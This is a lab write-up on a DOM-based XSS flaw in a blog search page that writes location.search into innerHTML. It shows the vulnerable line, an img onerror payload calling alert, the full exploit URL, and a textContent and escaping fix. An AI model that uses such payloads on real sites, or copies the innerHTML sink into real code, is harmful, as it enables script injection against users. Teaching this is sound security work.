🧪 DOM-Based XSS Lab (Search Blog)


📌 Info

This lab contains a DOM-based cross-site scripting (XSS) vulnerability in the search blog functionality.

The page assigns data from location.search to the innerHTML of a div element, so the browser parses input taken from the URL as HTML.


🎯 Goal

Perform a cross-site scripting attack that calls the alert function.


⚠️ Vulnerable Parameter

Example from the source code:

    element.innerHTML = location.search;


🛠️ Exploitation Steps

  1. Normal request:

    https://vulnerable-website.com/search?query=test

    → The word test is reflected back into the page.

  2. Inject malicious payload:

    <img src=1 onerror=alert(1)>

  3. Final exploit URL:

    https://vulnerable-website.com/search?query=<img src=1 onerror=alert(1)>
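
🛡️ Fix

The sink shown above can be closed by writing the search term as text instead of HTML. The following is an added example, not code from the lab: the function names, the `search-term` class and the `#searchMessage` selector are assumptions, and the parameter name `query` is taken from the URLs above.

```javascript
// Added example (not from the lab): safe handling of the search term.
// getQuery, renderSafe, escapeHtml and renderMarkup are hypothetical names.

// Return the decoded `query` parameter from a location.search string.
function getQuery(search) {
  return new URLSearchParams(search).get('query') ?? '';
}

// Preferred fix: textContent stores the value as a text node, so markup in
// the search term is displayed literally and never parsed as HTML.
function renderSafe(element, search) {
  element.textContent = getQuery(search);
  return element;
}

// Fallback when an HTML string has to be built: encode the characters that
// are significant in element content and quoted attribute values.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

function renderMarkup(search) {
  return `<span class="search-term">${escapeHtml(getQuery(search))}</span>`;
}

// Browser usage (the target element selector is an assumption):
//   renderSafe(document.querySelector('#searchMessage'), location.search);
```

With either function, the lab's payload is shown on the page as the literal string it is, and no img element is created.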